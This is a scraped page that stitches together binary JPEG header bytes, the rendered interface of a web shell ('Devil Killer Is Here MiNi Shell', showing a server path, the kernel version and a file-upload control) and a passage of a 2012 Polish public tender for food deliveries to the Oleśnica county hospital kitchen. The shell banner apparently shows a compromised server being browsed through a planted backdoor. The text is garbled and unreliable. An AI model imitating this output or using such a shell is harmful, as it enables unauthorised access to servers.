JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120629/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120629/227444-N-2012.html

<p class="kh_header"><b>Oleśnica: Przedmiotem zamówienia jest dostawa mięsa, podrobów i wędlin, artykułów spożywczych, nabiału, warzyw i owoców, ziemniaków, pieczywa, jaj i ryb mrożonych dla potrzeb kuchni Powiatowego Zespołu Szpitali w Oleśnicy.</b><br>
<b>Numer ogłoszenia: 227444 - 2012; data zamieszczenia: 29.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zespół Szpitali w Oleśnicy , ul. Armii Krajowej 1, 56-400 Oleśnica, woj. dolnośląskie, tel. 071 3143747, faks 071 3143747.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzsolesnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest dostawa mięsa, podrobów i wędlin, artykułów spożywczych, nabiału, warzyw i owoców, ziemniaków, pieczywa, jaj i ryb mrożonych dla potrzeb kuchni Powiatowego Zespołu Szpitali w Oleśnicy..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa mięsa, podrobów i wędlin, artykułów spożywczych, nabiału, warzyw i owoców, ziemniaków, pieczywa, jaj i ryb mrożonych dla potrzeb kuchni Powiatowego Zespołu Szpitali w Oleśnicy.

Szczegółowy opis przedmiotu zamówienia zawierają załączniki nr 2-10 do SIWZ.
Zamawiający dopuszcza możliwość składania ofert częściowych na poszczególne pakiety:
Pakiet nr 1 - Mięso, podroby i wędliny drobiowe
Pakiet nr 2 - Mięso wieprzowe i wołowe oraz wędliny wieprzowe
Pakiet nr 3 - Artykuły spożywcze
Pakiet nr 4 - Nabiał
Pakiet nr 5 - Warzywa i owoce
Pakiet nr 6 - Ziemniaki
Pakiet nr 7 - Pieczywo
Pakiet nr 8 - Jajka
Pakiet nr 9 - Ryby mrożone.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.51.20.00-0, 15.50.00.00-3, 15.51.11.00-4, 15.53.00.00-2, 15.43.11.00-9, 15.54.21.00-0, 15.55.13.00-8, 03.22.10.00-6, 03.22.23.21-9, 03.22.23.22-6, 03.22.21.11-4, 03.22.22.20-1, 15.81.11.00-7, 15.81.10.00-6, 15.81.00.00-9, 03.14.25.00-3, 15.22.00.00-6, 15.11.00.00-2, 15.11.10.00-9, 15.11.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegający się o przedmiotowe zamówienie nie może podlegać wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych oraz musi spełniać wszystkie warunki określone a art. 22 ust. 1 ustawy Prawo zamówień publicznych. Na potwierdzenie spełniania tego warunku Wykonawca musi złożyć oświadczenia według wzorów stanowiących załączniki nr 11 i 12 do SIWZ oraz dokumenty wymienione w punkcie 10 a), b).

Spełnienie warunków udziału w postępowaniu oceniane będzie wg kryterium spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w SIWZ. Z treści załączonych dokumentów musi jednoznacznie wynikać, że Wykonawca w/w warunki spełnił. Niespełnienie któregoś z w/w warunków skutkować będzie wykluczeniem Wykonawcy z postępowania, z zastrzeżeniem postanowień art. 26 ust. 3 i 4 ustawy Prawo zamówień publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta musi również zawierać następujące dokumenty i oświadczenia:
a)  wypełniony formularz asortymentowo-cenowy (odpowiednio załączniki nr 2-10 do SIWZ)
b) w przypadku reprezentowania Wykonawcy przez pełnomocnika, do oferty musi być załączony oryginał pełnomocnictwa lub jego kopia poświadczona notarialnie
c) jeżeli odrębne przepisy nie wymagają wpisu do rejestru, do oferty należy dołączyć dokument, z którego będzie wynikało, że osoba, która podpisała ofertę jest upoważniona do reprezentowania firmy
d) oświadczenie, iż  Wykonawca dysponuje środkiem transportu, spełniającym wymagania określone  w Rozporządzeniu Ministra Zdrowia z dnia 19 grudnia 2002 r, w sprawie  wymagań sanitarnych dotyczących środków transportu żywności substancji pomagających w przetwarzaniu, dozwolonych substancji dodatkowych i innych składników żywności (Dz. U. z 2003 r. nr 21 poz. 179) - (załącznik nr 14 do SIWZ)
e) oświadczenie o spełnianiu wymagań określonych w ustawie  z dnia 11 maja 2001 r. o warunkach  zdrowotnych żywności i żywienia ( DZ.U. Nr 63 poz.634 ze zmianami), w szczególności podleganiu stałemu nadzorowi właściwego miejscowo organu Inspekcji Sanitarnej lub Weterynaryjnej (załącznik nr 15 do SIWZ)
f) oświadczenie, iż zaoferowane artykuły są wyprodukowane zgodnie z Polską Normą (załącznik nr 16 do SIWZ)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>dopuszczalna zmiana warunków umowy może dotyczyć ceny w części dotyczącej zmiany stawki podatku VAT</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pzsolesnica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy zespół Szpitali
ul. Armii Krajowej 1
56-400 Oleśnica.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.07.2012 godzina 09:00, miejsce: Powiatowy zespół Szpitali
ul. Armii Krajowej 1
56-400 Oleśnica
piętro IV, pokój 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1 - Mięso, podroby i wędliny drobiowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Parówkowa
Ilość na 12 m-cy: 600 kg
Opis: Folia hermetycznie pakowana
2. Polędwica z pieczarkami lub produkt równoważny
Ilość na 12 m-cy: 130 kg
Opis: Osłonka foliowa
3. Polędwica drobiowa z kurczaka
Ilość na 12 m-cy: 200 kg
Opis: Osłonka foliowa
4. Polędwica z udźcem lub produkt równoważny
Ilość na 12 m-cy: 150 kg
opis: Osłonka foliowa
5. Polędwica drobiowa z indyka
Ilość na 12 m-cy: 200 kg
Opis: Osłonka foliowa
6. Żołądki drobiowe
Ilość na 12 m-cy: 200 kg
Opis: Opakowanie hermetyczne 1 kg
7. Wątroba drobiowa z indyka
Ilość na 12 m-cy: 350 kg
Opis: Opakowanie hermetyczne 1 kg
8. Kurczak świeży
Ilość na 12 m-cy: 500kg
Opis: Pojemnik 
9. Filet z indyka
Ilość na 12 m-cy: 300 kg
Opis: Pojemnik 
10. Filet z kurczaka
Ilość na 12 m-cy: 300 kg
Opis: Pojemnik 
11. Mięso gulaszowe drobiowe z kurczaka, klasa extra
Ilość na 12 m-cy: 500 kg
Opis: Opakowanie hermetyczne 1 kg
12. Mięso gulaszowe indycze, klasa extra
Ilość na 12 m-cy: 500 kg
Opis: Opakowanie hermetyczne 1 kg
13. Pierś drobiowa kanapkowa, wędzona/pieczona lub produkt równoważny
Ilość na 12 m-cy: 150 kg
Opis: Osłonka foliowa
14. Udko z kurczaka
Ilość na 12 m-cy: 800 kg
Opis: Pojemnik
15. Porcja rosołowa
Ilość na 12 m-cy: 2000 kg
Opis: Pojemnik
16. Szynka drobiowa gotowana 
Ilość na 12 m-cy: 150 kg
Opis: Siatka.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6, 15.11.40.00-0, 15.13.11.35-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2 - Mięso wieprzowe i wołowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Smalec
Ilość na 12 m-cy: 200 kg
Opis: Kostka 250g
2. Kości zwykłe / konsumpcyjne
Ilość na 12 m-cy: 2000 kg
Opis: Pojemnik
3. Karczek wieprzowy b/k
Ilość na 12 m-cy:	250 kg
Opis: Pojemnik
4. Mięso wieprzowe gulaszowe, klasa extra
Ilość na 12 m-cy: 600 kg
Opis: Opakowanie hermetyczne 0,5 kg-1 kg
5. Mięso wołowe gulaszowe, klasa extra
Ilość na 12 m-cy: 700 kg
Opis: Opakowanie hermetyczne 0,5 kg-1 kg
6. Pieczeń wołowa b/k
Ilość na 12 m-cy: 60 kg
Opis: Pojemnik
7. Łopatka b/k
Ilość na 12 m-cy: 80 kg
Opis: Pojemnik
8. Schab wieprzowy b/k
Ilość na 12 m-cy: 250 kg
Opis: Pojemnik
9. Szynka tyrolska lub równoważna
Ilość na 12 m-cy: 240 kg
opis: Osłona barierowa 1,80 kg
10. Kiełbasa kanapkowa
Ilość na 12 m-cy: 180 kg
Opis: Osłona barierowa 1,80 kg
11. Kiełbasa podwawelska
Ilość na 12 m-cy: 180 kg
Opis: Folia PA/PE 0,75 kg
12. Kiełbasa śląska	
Ilość na 12 m-cy: 200 kg
Opis: Folia PA/PE 0,75 kg
13. Szynka wieprzowa gotowana extra
Ilość na 12 m-cy: 50 kg
Opis: Folia PA/PE 1,5 kg
14. Szynka z pieca wędzona, parzona	
Ilość na 12 m-cy: 80 kg
Opis: Folia PA/PE 1,5 kg
15. Kiełbasa krakowska wędzona, parzona
Ilość na 12 m-cy: 80 kg
Opis: Folia PA/PE 0,70 kg
16. Boczek wędzony, parzony
Ilość na 12 m-cy: 60 kg
Opis: Folia termokurczliwa 1 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2, 15.11.10.00-9, 15.11.30.00-3, 15.13.11.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3 - Artykuły spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Budyń z cukrem
Ilość na 12 m-cy: 1800 torebek po 60 g
Opis: Torebka 60 g
2. Cukier kryształ
Ilość na 12 m-cy: 2500 torebek po 1 kg
Opis: Torebka 1 kg
3. Cukier waniliowy	
Ilość na 12 m-cy: 200 torebek po 32 g
Opis: Torebka 32 g
4. Herbata granulowana
Ilość na 12 m-cy: 800 torebek po 100 g
Opis: Torebka 100 g
5. Groszek konserwowy puszka
Ilość na 12 m-cy: 400 puszek po 375 g
Opis: Puszka 375 g
6. Kucharek lub produkt równoważny
Ilość na 12 m-cy: 360 torebek po 200 g
Opis: Torebka 200 g
7. Kasza jęczmienna
Ilość na 12 m-cy: 1000 torebek po 1 kg
Opis: Torebka 1 kg
8. Kasza manna
Ilość na 12 m-cy: 600 torebek po 1 kg
Opis: Torebka 1 kg
9. Koncentrat pomidorowy 900g
Ilość na 12 m-cy: 240 słoików po 900 g
Opis: Słoik 900 g
10. Koncentrat pomidorowy 165g
Ilość na 12 m-cy: 400 słoików po 165 g
Opis: Słoik 165 g
11. Koncentrat barszczu czerwonego w płynie
Ilość na 12 m-cy: 300 słoików po 190 ml
Opis: Słoik 190 ml
12. Kawa zbożowa
 Ilość na 12 m-cy: 600 torebek po 500 g
Opis: Torebka 500 g
13. Kwasek cytrynowy
Ilość na 12 m-cy: 400 torebek po 30 g
opis: Torebka 30 g
14. Kompot (asortyment: wiśnia, truskawka, czarna porzeczka)
Ilość na 12 m-cy: 500 słoików po 900 ml
opis: Słoik 900 ml
15. Kleik ryżowy
Ilość na 12 m-cy: 300 torebek po 180 g
opis: Torebka 180 g
16. Konserwa rybna makrela w pomidorach
Ilość na 12 m-cy: 1000 puszek po 310 g
opis: Puszka 310 g
17. Kisiel z cukrem	
Ilość na 12 m-cy: 7000 torebek po 77 g
opis: Torebka 77 g
18. Kapusta czerwona konserwowa 0,9 l
Ilość na 12 m-cy: 500 słoików po 900 g
opis: Słoik 900 g
19. Kakao
Ilość na 12 m-cy: 	120 opakowań po 200 g
opuis: Opakowanie tekturowe 200 g
20. Makaron asortyment (kolanko, nitka, łazanki, świderki)
Ilość na 12 m-cy: 1000 opakowań po 500 g
opis: Opakowanie 500 g
21. Mąka pszenna
Ilość na 12 m-cy: 2000 torebek po 1 kg
opis: Torebka 1 kg
22. Mąka ziemniaczana
Ilość na 12 m-cy: 200 torebek po 1 kg
opis: Torebka 1 kg
23. Musztarda
Ilość na 12 m-cy: 	120 słoików po 200 g
opis: Słoik 200 g
24. Marmolada twarda
Ilość na 12 m-cy: 600 opakowań po 500g
opis: Opakowanie 500g
25. Masło roślinne
Ilość na 12 m-cy: 1000 opakowań po 500 g
opis: Opakowanie 500 g
26. Majonez
Ilość na 12 m-cy: 250 słoików po 730 g
opis: Słoik 730 g
27. Majonez 
Ilość na 12 m-cy: 200 słoików po 260 g
opis: Słoik 260 g
28. Przyprawa w płynie typu Magii
Ilość na 12 m-cy: 250 butelek po 1 l
opis: Butelka 1 l
29. Majeranek 
Ilość na 12 m-cy: 120 torebek po 20 g
opis: Torebka 20 g
30. Ocet spirytusowy 10%
Ilość na 12 m-cy: 200 butelek po 0,5 l	
opis: Butelka 0,5 l
31. Ogórek konserwowy
Ilość na 12 m-cy: 800 słoików po 0,9 l
opis: Słoik 0,9 l
32. Olej
Ilość na 12 m-cy: 300 butelek po 1 l
opis: Butelka 1 l
33. Liść laurowy
Ilość na 12 m-cy: 120 torebek po 20 g
opis: Torebka 20 g
34. Pieprz
Ilość na 12 m-cy: 400 torebek po 20 g
opis: Torebka 20 g
35. Pasztet drobiowy typu Drop 
Ilość na 12 m-cy: 3700 puszek po 160 g
opis: Puszka 160 g
36. Płatki owsiane
Ilość na 12 m-cy: 400 torebek po 500 g
opis: Torebka 500 g
37. Przecier ogórkowy
Ilość na 12 m-cy: 400 słoików po 300 g
opis: Słoik 300 g
38. Ryż
Ilość na 12 m-cy: 	1100 torebek po 1 kg
opis: Torebka 1 kg
39. Sól
Ilość na 12 m-cy: 800 torebek po 1 kg
opis: Torebka 1 kg
40. Sos pieczeniowy
Ilość na 12 m-cy: 150 torebek po 30 g
opis: Torebka 30 g
41. Suchary z cukrem
Ilość na 12 m-cy: 600 opakowań po 290 g
opis: Opakowanie 290 g
42. Suchary bez cukru
Ilość na 12 m-cy: 100 opakowań po 290 g
opis: Opakowanie 290 g
43. Syrop owocowy (asortyment: wiśniowy, malinowy, żurawinowy)
Ilość na 12 m-cy: 1400 butelek po 290 g
opis: Butelka 290 g
44. Szczaw konserwowy
Ilość na 12 m-cy: 200 słoików po 300 g
opis: Słoik 300 g
45. Żelatyna
 Ilość na 12 m-cy: 400 torebek po 30 g
opis: Torebka 30 g
46. Mrożonka - fasolka szparagowa cięta
Ilość na 12 m-cy: 150 opakowań po 2,5 kg
opis: Opakowanie 2,5 kg
47. Mrożonka - szpinak
Ilość na 12 m-cy: 150 opakowań po 2,5 kg
ilość: Opakowanie 2,5 kg
48. Ziele angielskie
Ilość na 12 m-cy: 120 torebek po 15 g
opis: Torebka 20 g
49. Wafle w czekoladzie
Ilość na 12 m-cy: 450 szt. wafli
opis: Karton 36 szt. 1szt. =39g
50. Wafle ryżowe	
Ilość na 12 m-cy: 5 opakowań po 400 g
opis: Opakowanie 400g
51. Sok marchwiowo-owocowy
Ilość na 12 m-cy: 450 szt. po 300 ml
opis: 1szt.=300ml
52. Zupki marchwiowo-ryżowe od 5 miesiąca życia
Ilość na 12 m-cy: 80 szt. słoiczków po 130 g
opis: Słoiczek 130 g
53. Tuńczyk kawałki w sosie własnym
Ilość na 12 m-cy: 2000 puszek po 170 g
opis: Puszka 170 g
54. Papryka czerwona słodka - przyprawa
Ilość na 12 m-cy: 60 opakowań po 25 g
opis: Opakowanie 25 g
55. Bazylia - przyprawa
Ilość na 12 m-cy: 60 opakowań po 25 g
opis: Opakowanie 25 g
56. Przyprawa do kurczaka
Ilość na 12 m-cy: 60 opakowań po 25 g
opis: Opakowanie 25 g
57. Przyprawa do grilla
Ilość na 12 m-cy: 60 opakowań po 25 g
opis: Opakowanie 25 g
58. Oregano - przyprawa
Ilość na 12 m-cy: 60 opakowań po 25 g
opis: Opakowanie 25 g
59. Soda oczyszczona
Ilość na 12 m-cy: 30 opakowań po 80 g
opis: Opakowanie 80 g.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4 - Nabiał.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Mleko pasteryzowane 1,5%
ilość na 12 m-cy: 42000
jednostaka miary: Litr
opis: Worek foliowy 5 l
2. Ser żółty twardy
ilość na 12 m-cy: 150
jednostka miary: kg
opis: Typu salami, opakowanie 2 kg
3. Ser biały (twaróg półtłusty)
ilość na 12 m-cy: 2700
jednostka miary: kg
opis: Pakowany w pergamin po 1 kg
4. Śmietana słodka zawartość tłuszczu 15%
ilość na 12 m-cy: 1200
jednostka miary: Litr
opis: Worek foliowy 0,5 litra
5. Ser topiony
ilość na 12 m-cy: 150
jednostka miary: kg
opis: Opakowanie zbiorcze 10 sztuk x 100 g 
6. Jogurty smakowe, wieloowocowe
ilość na 12 m-cy: 3000
jednostka miary: Szt.
opis: kubek 125 ml, widoczne kawałki owoców, zawartość tłuszczu 2%
7. Masło typu ekstra 
ilość na 12 m-cy: 1500
jednostka miary: Szt.
opis: kostka 200 g (80-90% tłuszczu)
8. Śmietana kwaśna 12%
ilość na 12 m-cy: 550
jednostka miary: Szt.
opis: Kubek 450 g 
9. Jogurt naturalny ilość na 12 m-cy: 400
jednostka miary: Szt.
opis: kubek 125 ml, zawartość tłuszczu 2%
10. Margaryna
ilość na 12 m-cy: 1800
jednostka miary: Szt.
opis: Kostka 250 g (80% tłuszczu)
11. Masło roślinne
ilość na 12 m-cy: 1000
jednostka miary: Szt.
opis: Kostka 250 g.</p></li>
